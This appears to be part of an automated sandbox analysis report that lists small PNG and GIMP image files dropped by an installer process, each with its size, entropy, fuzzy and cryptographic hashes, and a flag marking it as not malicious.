                                                                                                    Preview:.PNG........IHDR... ... .....szz.....sRGB.........bKGD.......C......pHYs.........B(.x....tIME......._......IDATX.WIO#G...+;.Ab.@B$...&...Q.?B2Q...[...8!qEB......bK.....-!..n.....Twlfh.T.v....Wv...eY....Fjiii.R.|..T*.:..a.^.@.U..Z.......~yyy{vv....F.."..NOO....z...S...+....:;;. ...n</....^.xx(_^^.'''.;...mmm..eU...^....011....L.......-...y..Vx...}...A.X,...>..............G....|?99.077.=00.......L&..h._..e..*..U(X....w......w...?.;;;_.........`_www[___..@.Q.H.O..........$,..r.J.P.nnnV..{....{j.....B@..c....!....u....C"P4M.b...V`./<,|.....t...J6...^...H.3..-m.}..5..)..A.0.-Z...!.......V....".:....Y#..z$^H.......eZBa.[..cXd....P:f.P>.&...<....-..v.2..J..DV-.5..i.Z....F....u E.%9...(p....Bpu...Gp...P.]..j.....U..i.!b...*..I.NF(.5.."-.n..L.V.1I.L.D>-..2..Ih..}.J*.`;.......u..*..0..=CC+.P.B.i.@...+..............:1....N%.M<e.....XAUF.W.Sb.M.f.=G...*.be..j.'/...$#.H..0...^......=..u.1s7.B......L....RO.L.Y....T....].Lk..SS..I(..4.Lwf.3N...=...sF#..o9.MK."`...
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):208
                                                                                                    Entropy (8bit):6.056729441397141
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VINtlMv+YftbtCETdkth4EN0QIVp:6v/7uTVI6T6T4ENRI7
                                                                                                    MD5:3DBA17AB50E1923EB74BF395677EFA06
                                                                                                    SHA1:F293297F4127A788E07D365FD4AB5EB19C7383C4
                                                                                                    SHA-256:33BF303743432947AF7E5E4FCFE7A7FF453FCFBFA6ABDC24671071B7C205DA84
                                                                                                    SHA-512:618BFD415108DDB51B7A1D1003D5E40A417BA36F612EF6FBB5F627AE7FDA2388AC2F08F8BFBE5CF6F172DF26737773C902A85FD98DEFB0CD7DE94B3CFF77FAD6
                                                                                                    Malicious:false
                                                                                                    Preview:.PNG........IHDR.............V.W....bKGD..............pHYs...........~.....tIME.....,"E......]IDAT8.c...?.50.AT5....(1......../%. 9.._.!`19........,....5..a) ^..?)5....@|...F.<.F.h^..A..p..:.j=....IEND.B`.
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.815385299502723
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1Aqg/ml90lvGdw1CwHTQ5NsEZxKG2mpFbp:6v/lhPW/WqgmnBdw1CFNsgdLbp
                                                                                                    MD5:CE4C02BA4708A1AAB1572A9148A94B95
                                                                                                    SHA1:E90673F72B063A610E7383EB7DAFEC7F0BD35549
                                                                                                    SHA-256:6E1332235BB51B2E29B244E5056A6C82015A5FEE79DB2D3A553CD6610DC3BB04
                                                                                                    SHA-512:902C214744235E7CA936D2B16215B63500BA980C00ADFD3773D2EFA65E12FD3EB34DA4F430024BEF2F781F762E4A938778C6AD71AF6D86A9CF02EF53C41E1233
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):551
                                                                                                    Entropy (8bit):7.319024742694981
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2HRd4HSOKRcIzpsbPjUdb4pndLBaXeeFUDqtCmN09:HS2HRd4HSBR5KbPognzadIb
                                                                                                    MD5:731657BF68ECC98F0DBE29095CCB88F7
                                                                                                    SHA1:D3B49C3AD148EC96F3088371715121D32EAA7843
                                                                                                    SHA-256:F95DA774191F393BA0EB0436B4CB22920C5F880ED51010177E6E9189CD36C44A
                                                                                                    SHA-512:DE50FC25578922C8BE31D869B70FC0559C965022D6BCCF71DE6CDD541B424DB67E1AE1032AEBAAE03DF66744A27344194AA7994C9CE84317D1AFD1B437D9AA9E
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):517
                                                                                                    Entropy (8bit):7.3380534299819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H4ZZG1CXGrA0JI/88sXEZ1gBxPibGo1+bsI:HS2H4ZGCWXC/tHZ10PiaJP
                                                                                                    MD5:156D5836B29559FD2A8AFACFA2931192
                                                                                                    SHA1:D92B24898B7483591E5B088C60D05B73355AD0EC
                                                                                                    SHA-256:ECE2829963DECBC954FDBC7F831451D36F1248EBDEAAC181B68AEBEC00BE3555
                                                                                                    SHA-512:591CCEED7768A3D6C87A9DC7EE34F9B1A1463AEE30C184027C24294901179BA9C6BFF697FD7004E22F12605D45CB7BC18FFE1C9D7D798A7AB40004FF36FBC656
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):220
                                                                                                    Entropy (8bit):6.113077361175645
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/CsQH4dKcDA/M+DPu45sC93H5Adp:6v/7ugHcZuK45sC9X5C
                                                                                                    MD5:0BAE3C12DFF85642E6DEBB90607258F0
                                                                                                    SHA1:2B369328373C449DA154FEEC4235464F53AC27FB
                                                                                                    SHA-256:8C41C0E27B9D85D5D49BF44F00A096FA18680E85077FFEB9EC65750F1EFAAA41
                                                                                                    SHA-512:D86BAF78EECDFB96E857D1749BB0580F6230F83D54D4F4843F94EC6335AF339D22560A00907E897A9BB427200305B83056B4649321ABE0C719DDCA89549639D0
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):593
                                                                                                    Entropy (8bit):7.479894563773081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIniUpZzmH9D1hP79P2J2ySk9BvSpqKu6kZPdiaXVygV271:giUpMDrD8J2ySMKIZoaX0gV271
                                                                                                    MD5:FFCCEC64441F01C7AA82069BB8D5E9D9
                                                                                                    SHA1:45C02522F48129065104E1C9B4E6AC63434CC7D9
                                                                                                    SHA-256:B8CEB44936275B37F8D08F71F01F223866CEE50E53182D529A3768514A8C7662
                                                                                                    SHA-512:E8709643F6C4CBAA98F7BF870028664324DE673141F1B9FCE995A03D011C4374817846DCED739B4A3DD37D315A474F739ACAD2933ACA63C67FA0216356B8E608
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):195
                                                                                                    Entropy (8bit):6.589496150082679
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/YkNWoInpCU14phhk1NWMUGHgyU/Hljp:6v/7uSoIpCUKhhDMUrymlN
                                                                                                    MD5:3043F969482A1E805E6DCA44A6072881
                                                                                                    SHA1:B5764E5B1B26D11737D9307A70E14403E7063A4A
                                                                                                    SHA-256:10A3799ABAABF93F03FD86A23FAFC6C68EB04B5BFB86497F04505DF151E1177E
                                                                                                    SHA-512:3BEAAFABEEF07E3BB7E95DC6C761157C38B9B2B2BDB99C517C073AA137950BFE010C0BDFCC29E955B6A46D6BEED4AB4D8D8D1EF580DD23E8A6B0F471E1FEB4D3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):137
                                                                                                    Entropy (8bit):5.807754777184353
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8ll1AqgRtKq2HYGHgsG0z4H1iBLq/bp:6v/lhPW/WqoKq24Psjz4H1ipep
                                                                                                    MD5:BDBB9972D9B7265AD10EDB04A9C2E239
                                                                                                    SHA1:DCA1CBFD90B5C644E37DBB6748227E3EB472E0C8
                                                                                                    SHA-256:866FC4117FC8B133D84C9AC96D13A37E99EBF626CEA47F0E8B059B6641FFC7C3
                                                                                                    SHA-512:BA6059567C6EF35161BD3A82D320EFB8E16435EBFF9CA851AC724A58F45726621BCF7F380DBD2A94A29B5DD919FEF294E7440B31F2B2FACC42AAA1968144020D
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):333
                                                                                                    Entropy (8bit):6.65458733329839
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSJPwlzkv8z8zKWHCB9mowuVIRmCtIyWDoKby2Fb/67YEFp:6v/7iIGMfbllL5zMKWHCBBIRwyW0KbzG
                                                                                                    MD5:16CE13BC8208F1C0B9422FFAFBC46C6E
                                                                                                    SHA1:FB6B11EE39E0143A056385B25761FCB0E9ED980B
                                                                                                    SHA-256:1EC3BD426CCE1B1BD23664ADCC11FE51D04DE791FADB6A731DE7EB5076B26163
                                                                                                    SHA-512:46EB74547599EED50ED554DCAD5567198D20AAEF7B8D0F2F22E1912224F381F91F5501E4985B007945FC5D4A12B85ED0E06184168F6EE614135C8AFAE13334A5
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1128
                                                                                                    Entropy (8bit):7.702657785044095
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:CiUpjur3mHiYuZssTwiTn7JgcOc/irhx1F613aC8BLZ2cL/Fsc:CNpj23hnNTwiTPzU6t+JI4FN
                                                                                                    MD5:3F6A543B6C75ACB2EE000A3BAC7B9A59
                                                                                                    SHA1:A53275A9B4F65393301A1C787B67E87FFDA8234F
                                                                                                    SHA-256:3FACB849498CFA7CCF96BF7B02C5792C0DC49374EA7DDDC8F78E7ED53A96C72B
                                                                                                    SHA-512:E9E98AFF394E4ADAEA3C79096BD8DC865EF539D67F9E3030FEB7F4FACAACC1278606592228A19733AF99128966530CEC1363E9C6DAB6C555DFC0D8C7ADB51517
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):69
                                                                                                    Entropy (8bit):4.258998795700668
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPlv5hrl6hJbF/k3ollkup:6v/lhPZcJq4ldp
                                                                                                    MD5:A7204A9D9C26A12DD3C0B069EFD8ACAC
                                                                                                    SHA1:5E1E54C75D7D83147DD57DCCBCC5302D1798B21E
                                                                                                    SHA-256:FA56F736618C032485F27BA183FF0D5226006E2080CF20813AF1C6A7B93F4AA3
                                                                                                    SHA-512:7401056BE66AE9CDAF9EFEF6DBA0F96384964DA491F538C35C283419EE819F767D6BFC601E2FEF8445FA25A447A5550C6CD8986330329981B852940EC334F08F
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):549
                                                                                                    Entropy (8bit):7.372873904443628
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H0ZF0NS5rNgZK5S80iwpLboX30XuQBMBVEB5Hk:HS2H/NS17A8v1X3wuxYY
                                                                                                    MD5:FA26AC420BEA517A2C4247572E33842E
                                                                                                    SHA1:06DE61402AAA1A2ADC2EF2969E76B7200A9D13AA
                                                                                                    SHA-256:8D8451A732FA6662F6FCE32CCF6751E421C6FFC7C5B819C29AB1482967B05FFA
                                                                                                    SHA-512:8850CFCD06A82FA41D4B30F88DE5485857B2BD1B548CEC4A7F38B78E3427AEDA01B44762161D8352501F6AE0EBBAEE82AF71F52296CCB93399B4C01C6864D382
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:GIMP XCF image data, version 0, 32 x 32, RGB Color
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3977
                                                                                                    Entropy (8bit):5.413488066014333
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:7dsNCv/C/CVGhkFTKfyeeocjI4Dc8oPjZ/narUX0Zwnc1ZHHdOkdsFVpAa:KcQ2Gyejc0QoPjZ/KKgwniLsFVpAa
                                                                                                    MD5:1339E8669A986ACB3CCA794EF7E67ABB
                                                                                                    SHA1:8295D74B144481F86B928D0C9A2F16AE0FF86F7C
                                                                                                    SHA-256:4D58C67A4095BE33201E16C2545B28DEF1CBA2D7690F0540877866CFC7ACE230
                                                                                                    SHA-512:DF9AA421947EF90713D0F9D2648803DDC975DB7FDB67F2941A9CA7FD489C9734081FE085C4ED4335C798A05CE2028D84C22A4948C558FDCBE86593CFEBB6A796
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):324
                                                                                                    Entropy (8bit):6.776590990847706
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhP6IcHMRfCCllSP7k0Rt64huUPOfsIuDRWi9I1z2He4hsCvJgVm/kup:6v/7iIGMfbll8g0RciuU2fy9I1zg3lJP
                                                                                                    MD5:389BCEA15865028B56A0A70C87E13DCA
                                                                                                    SHA1:B771E6A3E73B2B3E4B440B2E59D98E9D7F3B60C7
                                                                                                    SHA-256:5CAA4636ADE7C9B36E257D1AB01D06FDA59310781F4C1E5B527342D5DD8B8DE3
                                                                                                    SHA-512:BDD82387E62B1726B402B1BE8B87CD2BF02C794A77525E4780A96DAE71E6CBF5F17261706A161A7AE1FDB8F15542DD2A3046ABE0A3328B5139C99F9F9CDDDFA3
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):559
                                                                                                    Entropy (8bit):7.393060209024772
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H1ClNHN+5CWPctjcNirsMD0YrO5kOBMlz:HS2HkHeCmPGxbibO9
                                                                                                    MD5:C720EFDABF3F8B47BD07FCFE80AF5608
                                                                                                    SHA1:A63400832DC55C911113C0176DA2EE6DF04F5D4F
                                                                                                    SHA-256:C81909BB15E1417A075DB27E1FA348C9371F68BF55B434FC70FB28FD5AED37AD
                                                                                                    SHA-512:1EF5ADCDE29FC4316DB7292D53741C3330BF17203B24EFDB6D1112413763FE37822BBDD9008B0C0E7A2210FA519D56922CB574C23043A12954FEF9ECDCBF382D
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):437
                                                                                                    Entropy (8bit):7.172409807946269
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllRNTwF4Aca6vxsbrVnsgP7F9J6Jz17:HSbHRhwF4A56vuZ/Z6t17
                                                                                                    MD5:E51360FDC759C15DEF4ED591275F6E37
                                                                                                    SHA1:723E725BAB93316AA5CBEEAF65A782777DD28983
                                                                                                    SHA-256:559FD805D661B05A7B67119EF93067D6BF076D5A92470F343332D80EB6C67168
                                                                                                    SHA-512:8BE34022F9188993A642A10A31D3AA05865254C69134726F5C1891E6537AF94A6E625D63A6E8D3C058A10E49A60D03C407AD8D6D70F09452D91957680D99E115
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.427379953657502
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXb0oWhAm2KWmLk8vJvP+u3tKDhqcl1:6v/lhPW/sAXkDokflFoWhAmtW6k8ZUbp
                                                                                                    MD5:830FC62D759022DDBC665F1D8D2E9164
                                                                                                    SHA1:84FBC1F8F3770905AB365D465C956756FD62E15A
                                                                                                    SHA-256:0D0ED367EC6578DD5DB6A3637A5CFBF6DDEEB1CE12953C1DF09FEF8F8BD897AA
                                                                                                    SHA-512:B948DD792BC0379AFF1DB46A8ABFE5803005E3C5C1BC2F2ED382C4D5AF09DCCA7C8F98400B46B0C5CC1100CD492A8D1C3B90A5BE9B2C5EA2537DAA7911B3458C
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):135
                                                                                                    Entropy (8bit):5.763983120472731
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llrAkxHgbcMktxY8ot4sUnG/QgjOD4l+dCKolkup:6v/lhPW/skd/Mktx+thzjOciCflkup
                                                                                                    MD5:C1E1CF920D57580A1337044D9244B41A
                                                                                                    SHA1:2713C8C06B08A204042B3BF92F6E31724E965E81
                                                                                                    SHA-256:8BFC445B29843719FB37F265F727D4E9E6F6C0814F054A6330C096022CA7995A
                                                                                                    SHA-512:87968296D3A160EEA1C3CE012300DF21CC59ED57ADE023B76E9238AE37F491B3F585663CBC4ED86A99EA1E3C4E392672E0CEA803A2641C9F05651E62240FF358
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):194
                                                                                                    Entropy (8bit):6.478660891705174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8llsAX81qfqjovwzflWfXbbt8i7ltydfIxDGKuQ11iEUvWK2K1:6v/lhPW/sAXkDokflSoAkpOKtMyldp
                                                                                                    MD5:88BC92E4CF3288BA93CAF398950874CD
                                                                                                    SHA1:F1B9F2C5EF5566C5BD983B5E1B3DFF17B06412F2
                                                                                                    SHA-256:258CD3545E4E4A9CF32F31FBD1AAF19869118F2B32CC8AB88C421D53F0A63D6D
                                                                                                    SHA-512:07DCA4BFC9581F425D7BAAB13E91668A0F1C832518DE7E98C0F872A305401B68B1D1C6DB56A81CF55A81E6587DD57168AF49D5676FF24C07A0BF6B0E04FADF8B
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):128
                                                                                                    Entropy (8bit):5.703022629772099
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:yionv//thPljll8lli9uOgkBCvMibqMGuNGpNfodyfsiB1p:6v/lhPW/i9uOliMibqMGjAMkijp
                                                                                                    MD5:65B820457098F3E41079DB7B024D6911
                                                                                                    SHA1:2D35F7523C5F990B810FAD7E2DFB1E2E46DC94AB
                                                                                                    SHA-256:3CA8816EC6B9E88958D7D33C3532CE57223E5B3454D2AE329A54C964590034D6
                                                                                                    SHA-512:52FAD1A53340EE03016E6B63364EE937BBA8C1FCBC8F491011D707102100F9BFCBB62C5D0B9D3F40BF8CEF48E4E9566271019CBA10CD57C4ACFA05EF210DF4E8
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):193
                                                                                                    Entropy (8bit):6.5470203907323725
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/bkgGNdjs2jOTS3Bs077TxUVxhlup:6v/7uzkgG7Y2yU14lc
                                                                                                    MD5:8FB0652E37E5375EFBFFC85E000333EC
                                                                                                    SHA1:98DF46702AB67C5CFF30922BE409209CEA30A6B5
                                                                                                    SHA-256:90939B8E3B4A568724143D056A93CD7B5528D4841A9D11EA0A4B11C2A35A4E03
                                                                                                    SHA-512:EF67A9624AA003A77724CB90F456A84181746E585003B31AE714A2870FFB3B2F069382CD7DA464FDE6BA68C37A94AE42CCB58B80E0608D41EEF30A81260D5545
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1442
                                                                                                    Entropy (8bit):7.754161124979248
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oq2vym+9kVWUOASjz39hd/9uinkxIyJubx/98nDDJFPyvfCDFHTCyFm+3wTf8f4C:aqmzV9az39z9hnkx+2DfyyD9TFAAwTfI
                                                                                                    MD5:46934D3CAA685BB0DBECF20BAB8BC317
                                                                                                    SHA1:DD61BF668D265AB3FBB61C6CB6CF25778632154F
                                                                                                    SHA-256:AC57AEA1D66661974EA2922733661B27D26D3C2026321E77A2A9ACE1CDAD558C
                                                                                                    SHA-512:BCB6D969F8823196652B4093988719C9F51940890D212A0E743CC887C46BE3DAD00D95B47970F1E682F3A40E7F7216EBFD4B37626AE130FE57F7F3CEBA718AE4
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):434
                                                                                                    Entropy (8bit):7.191504491746101
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMfbllDGOEGFo+bciyq44LnHolz:HSbHCOEUo/W4EHa
                                                                                                    MD5:7E5A76C4CF167C7549FAD937DC8B3DA3
                                                                                                    SHA1:7BDBE8BE6737C51C292AA8F51F9586DB0432AB39
                                                                                                    SHA-256:77D9DBC6CC93882EEC1BA969D14AD6C0FDEFE35302F0F930751C4B5BAED2ABFE
                                                                                                    SHA-512:30D230F3F7A62425D92B5227D482E000741C34769BB88CB0F4EDABA782D3834892D9C0A1BC4468DA667951FF489453FD2B3B426ADC38BF6BA5EA34CEEACCC077
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):502
                                                                                                    Entropy (8bit):7.307082621377148
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H5kGLptWrJMNbLtUWrPwIfYSA2go4aOq07:HS2H6G16JEbSuff8hnaOq07
                                                                                                    MD5:9BBFAFFA43A8745739977748E1680DAB
                                                                                                    SHA1:A2DE96CC6B8D6A22F2E517ED8828A0E65769C6EB
                                                                                                    SHA-256:EAD5682AA1875AC0664177D32B817A0BE555B90AABB88DD8FA914FAF42125896
                                                                                                    SHA-512:3E1E77835D3786D1FFAE02EAEFD41FEF7BD55955F08806C176A5E5A06169029F07E194D001927E5AEAD066FA41C90CA1B41E354F274C3AA1C6A78EF0E37717E1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 18 x 18, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):206
                                                                                                    Entropy (8bit):6.093633689706192
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:6v/lhPW/f19VNtTlMGBSCghX2AGBIcDV6fr66Vp:6v/7uTVPTChXCBN8fJ7
                                                                                                    MD5:2DE4E41A0E31A4C0FBB2D7FC3CBC31CE
                                                                                                    SHA1:0704F540352C579647D28E5E7821D7CA7FCC6613
                                                                                                    SHA-256:FBEC4D0BC6ED3DFDADADFFD10EB9F04058DFC11E7248DD73814E7806E58795FA
                                                                                                    SHA-512:FE60C53AADB80B6B922E17B822710A6820046C07D2742694BDF3019DD025EB8ABF4366849BE789E122B7053D5B7798D1CEAA9A296C3D007C557D95CDFFEC0115
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):556
                                                                                                    Entropy (8bit):7.316549998180671
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:6v/7iIGMf2H9fw3E/3lkWcxh66ScOaqgx531nDqLwzIdjzRvL77:HS2H9YU/eWIfScvbnDzzchvLH
                                                                                                    MD5:E4118A159AC2AAB1876E440CF770CA3D
                                                                                                    SHA1:27A28242395D33530A955D2D6FE479A9D45DB0CC
                                                                                                    SHA-256:08268FF255BFD01B6AA0184ECD06B5A0C48D016BC429D3B155B7149A8CD10FDF
                                                                                                    SHA-512:611EAC1EB04097730CD7B8D9C52FF7DA5D2F741E8C4A54F291C0137B75DD326F42CF35AEDBDB17D153BA20845904BE9F1F3753069B36D3050E907FA5C3D3461A
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1497
                                                                                                    Entropy (8bit):7.768741056434717
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqyoicsCo1Rd3ASFaaFX4FumgLpc8ut4qzrtpei0AF3BkNmhqCTEOU:eznTR3YaFXSiut4qzrtbeNmhTE7
                                                                                                    MD5:F860FF3693F12371577E33808AEA17E7
                                                                                                    SHA1:10EA223E855685506460EA8C3FC9427350CAA1E2
                                                                                                    SHA-256:B8714DCC43D031A602E3C560EBB1A07C1A892AB84E34F06EDEB03B59FEB09BD6
                                                                                                    SHA-512:6A6307796F6C6D5FEC3A0B4168DCAD5E6B15008D5CC247B562ECE25E25B87AC40ECB372038E351674FC75AB391CA23E47B8DF1966D2849DC3DD0ADFFB7CEFA62
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1555
                                                                                                    Entropy (8bit):7.796645823149652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:oqhLS0rCCBSazjoXK2RM1EpIuNF0piVLDlZLfciK3ZCHBJW:VjrBBSFXKP1ECuNF0piVLDlBfcOM
                                                                                                    MD5:486390A2CE5B4CC1393AC254780A7C7C
                                                                                                    SHA1:4305181EC1910A666A47C3715D27F5CA6991D688
                                                                                                    SHA-256:AB3BDFDFEED5743FD4AF47B0BA6AAAD914661DCE381A6FF8C8C8994363F83909
                                                                                                    SHA-512:F3F6051BA679C6F329A18E97F12CB6FFD9ED18D0F054C79ED9F2FB5D23F0484A12DB0FD16CD47F52B67E3D617F9BE728F9BECC850CF6A61FE9B74ED9701C2DD1
                                                                                                    Malicious:false
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-BVT50.tmp\L9rm7AX4mp.tmp
                                                                                                    File Type:PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced
                                                                                                    Category:dropped
                                                                                                    Size (bytes):636
                                                                                                    Entropy (8bit):7.494209461570772
                                                                                                    Encrypted:false
